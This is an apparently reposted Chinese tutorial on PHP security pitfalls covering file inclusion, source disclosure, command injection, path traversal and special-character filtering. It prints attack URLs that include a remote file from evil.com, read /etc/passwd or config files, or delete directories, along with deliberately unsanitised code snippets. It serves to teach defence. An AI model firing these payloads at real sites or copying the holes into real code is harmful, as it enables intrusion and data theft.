返回首頁
當前位置: 主頁 > 網絡編程 > Php實例教程 >

重燃你的php安全之火

時間:2015-03-08 16:19來源:知行網www.bccsxs.icu 編輯:麥田守望者

對于腳本安全這個話題好像永遠沒完沒了,如果你經常到國外的各種各樣的bugtraq上,你會發現有一半以上都和腳本相關,諸如SQL injection,XSS,Path Disclosure,Remote commands execution這樣的字眼比比皆是,我們看了之后的用途難道僅僅是抓肉雞?對于我們想做web安全的人來說,最好就是拿來學習,可是萬物抓根源,我們要的不是魚而是漁。在國內,各種各樣的php程序1.0版,2.0版像雨后春筍一樣的冒出來,可是,大家關注的都是一些著名的cms,論壇,blog程序,很少的人在對那些不出名的程序做安全檢測,對于越來越多的php程序員和站長來說,除了依靠服務器的堡壘設置外,php程序本身的安全多少你總得懂點吧。
有人說你們做php安全無非就是搞搞注入和跨站什么什么的,大錯特錯,如果這樣的話,一個magic_quotes_gpc或者服務器里的一些安全設置就讓我們全沒活路了:(。我今天要說的不是注入,不是跨站,而是存在于php程序中的一些安全細節問題。OK!切入正題。

注意一些函數的過濾
有些函數在程序中是經常使用的,像include(),require(),fopen(),fwrite(),readfile(),unlink(),eval()以及它們的變體函數等等。這些函數都很實用,實用并不代表讓你多省心,你還得為它們多費點心。 :)
1.include(),require()和fopen(),include_once(),require_once()這些都可以遠程調用文件,對于它們的危害,google搜一下你就會很明了,對于所包含調用的變量沒過濾好,就可以任意包含文件從而去執行。舉個例子,看print.php


if (empty ($bn) ) { //檢查是變量$bn是否為空
include (“$cfg_dir/site_${site}.php”); //把$cfg_dir這個路徑里的site_${site}.php包含進來

不管存不存在$cfg_dir目錄,$site這個變量你可以很自然的去使用,因為他根本沒檢查$site變量啊。可以把變量$site指定遠程文件http://evil.com/cmd.gif去調用,也可以是本地的一個文件,你所指定的文件里寫上php的語句,比如,(執行系統命令的語句),然后它就去包含執行這個含有php語句的文件了.就像這樣

http://target.com/print.php?site=../../upload/20050118.gif?cmd=dir
http://target.com/print.php?site=http://evil.com/cmd.gif?cmd=dir //列出文件目錄

甚至可以擴展到包含一些管理員文件,提升權限,典型的像以前phpwind,bo-blog的漏洞一樣。除了依靠php.ini里的allow_url_fopen設為off禁止遠程使用文件和open_base_dir禁止使用目錄以外的文件外,你還得事先聲明好只能包含哪些文件,這里就不多說廢話了。
2.fopen(),file(),readfile(),openfile(),等也是該特別留意的地方。函數本身并沒什么,它們的作用是去打開文件,可是如果對變量過濾不徹底的話,就會泄露源代碼。這樣的函數文本論壇里會有很多。


$articlearray=openfile(“$dbpath/$fid/$tid.php”); //打開$dbpath/$fid這個路徑的$tid.php文件
$topic_detail=explode(“|”,$articlearray[0]); //用分割符|讀出帖子的內容

很眼熟吧,這是ofstar以前版本的read.php,$fid和$tid沒有任何過濾,$tid指定為某個文件提交,就發生了原代碼泄露。就像這樣。

http://explame.com/ofstar/read.php?fid=123&tid=../index

$tid會被加上php的后綴,所以直接寫index。這僅僅是個例子,接著看吧。
3.fwrite()和它的變體函數這種漏洞想想都想得出,對于用戶提交的字符沒過濾的話,寫入一段php后門又不是不可以。
4.unlink()函數,前段時間,phpwind里任意刪除文件就是利用這個函數,對于判斷是否刪除的變量沒過濾,變量可以指定為任意文件,當然就可以刪除任意文件的變量。
5.eval(),preg_replace()函數,它們的作用是執行php代碼,如果字符串沒被經過任何過濾的話,會發生什么呢,我就常看見一些cms里面使用,想想,一句話的php木馬不就是根據eval()原理制作的嗎?
6.對于system()這些系統函數,你會說在php.ini里禁止系統函數,對,這也是好辦法,可是象一些程序里需要,那是不是就不用了呢?就像上次我看到的一套很漂亮的php相冊一樣。另外對于popen(),proc_open(),proc_close()函數你也得特別注意,盡管他們執行命令后并沒有直接的輸出,但你想這到底對黑客們有沒有用呢。再這里php提供提供了兩個函數,escapeshellarg(),escapeshellcmd(),這兩個函數用來對抗系統函數的調用攻擊,也就是過濾。
對于危害,來舉個例子,我們來看某論壇prod.php

$doubleApp = isset($argv[1]); //初始化變量$doubleApp 07行

if( $doubleApp ) //if語句 14行
{ //15行
$appDir = $argv[1]; //初始化$appDir 16行
system(“mkdir $prodDir/$appDir”); //使用系統函數system來創建目錄$prodDir/$appDir 17行

本來是拿來創建$prodDir/$appDir目錄的,再接著看上去,程序僅僅檢測是否存在$argv[1],缺少對$argv[1]的必要過濾,那么你就可以這樣

/prod.php?argv[1]=|ls%20-la或者/prod.php?argv[1]=|cat%20/etc/passwd

(分割符 | 在這里是UNIX的管道參數,可以執行多條命令。)
到這里,常見的漏洞類型應該知道點了吧。

對于特殊字符的重視
對于特殊字符,有句話叫All puts is invalid.外國人文章里這句話很常見的。所有輸入都是有害的。你永遠不要對用戶所輸入的東西省心,為了對付這些危害,程序員都在忙著過濾大把大把的字符,唯恐漏了什么。而有些程序員呢?好像從沒注意過這些問題,從來都是敞開漏洞大門的。不說廢話,還是先看看下面這些東西吧。
1.其實程序的漏洞里最關鍵,最讓開發者放心不下的就是帶著$符號的美元符號,變量,對于找漏洞的人來說,抓著變量兩個字就是一切。就像目錄遍歷這個bug,很多郵件程序都存在,開發者考慮的很周全,有的甚至加上了網絡硬盤這個東西,好是好,就像

http://mail.com/file.php?id=1&put=list&tid=1&file=./

要是我們把file這個變量換成./../甚至更上層呢?目錄就這樣被遍歷了。
2.尖括號”<>”跨站你不會不知道吧,一些搜索欄里,文章,留言,像前段時間phpwind附件那里的跨站等等。當然,對于跨站問題,你要過濾的遠遠不止尖括號。不怕過濾時漏掉什么,而是怕你想不起要去過濾。
3.斜桿和反斜桿:對于/和\的過濾,記得魔力論壇的附件下載處的原代碼泄露嗎?

attachment.php?id=684&u=3096&extension=gif&attach=.\..\..\..\..\..\..\includes\config.php&filename=1.gif

對于過濾.. / \的問題,像windows主機不僅要過濾../還要過濾..\,windows主機對\會解析為/,這些細節跟SQL injection比起來,什么才叫深入呢?
4.對于反引號(“),反引號在php中很強大,它可以執行系統命令,就像system()這些系統函數一樣,如果用戶的惡意語句被它所執行的話就會危害服務器,我想除了服務器設置的很好以外,對于它們,你還是老老實實的過濾好吧。
5.對于換行符,NULL字符等等,像”\t,\x0B,\n,\r,這些,這些都是很有用的,像動網以前的上傳漏洞就是因為上傳中的NULL()字符引起的,對于這些能隨意截斷程序流程的字符,你說我們在檢測的時候應該有多細心呢?
6.分號(;)和分割符(|)
分號截斷程序流程,就像這個

shell_exec(“del ./yourpath/$file”); //使用系統函數shell_exec刪除文件$file

變量$file沒指定,那么直接寫zizzy.php;del ./yourpath ,這樣你的yourpath目錄也就被del了。
分割符(|)是UNIX里自帶的管道函數,可以連接幾條命令來執行。有時候加在過濾不嚴的系統函數中執行。

邏輯錯誤
驗證不完全和一些邏輯錯誤在程序里也很容易找到,特別是現在的程序員,只顧深入的學習,而對于邏輯錯誤等等這樣的安全意識都沒有培養的意識,其實這是是靠自己去培養,而不是等著人來報告bug給你。對于邏輯錯誤的判斷,我們只能說,多練練吧,經驗才是最重要的。
1.對于登陸驗證的問題。舉個例子:我們看某論壇的admin.php片斷

if ((isset($_SESSION[‘username’])) && (isset($_SESSION[‘password’]))){
//是否存在username和password
$_u = $_SESSION[‘username’]; //提取username為$_u
$_p = $_SESSION[‘password’]; //提取password為$_p
………
$yes = mysql_query(“select * FROM users where username='”. $_u .”‘ AND password='”. $_p .”‘”); //執行mysql查詢語句
..

------分隔線----------------------------
標簽(Tag):php php教程 php實例教程 php5 php源代碼 php基礎教程 php技巧 php6
------分隔線----------------------------
推薦內容
猜你感興趣
赛车pk10官网开奖记录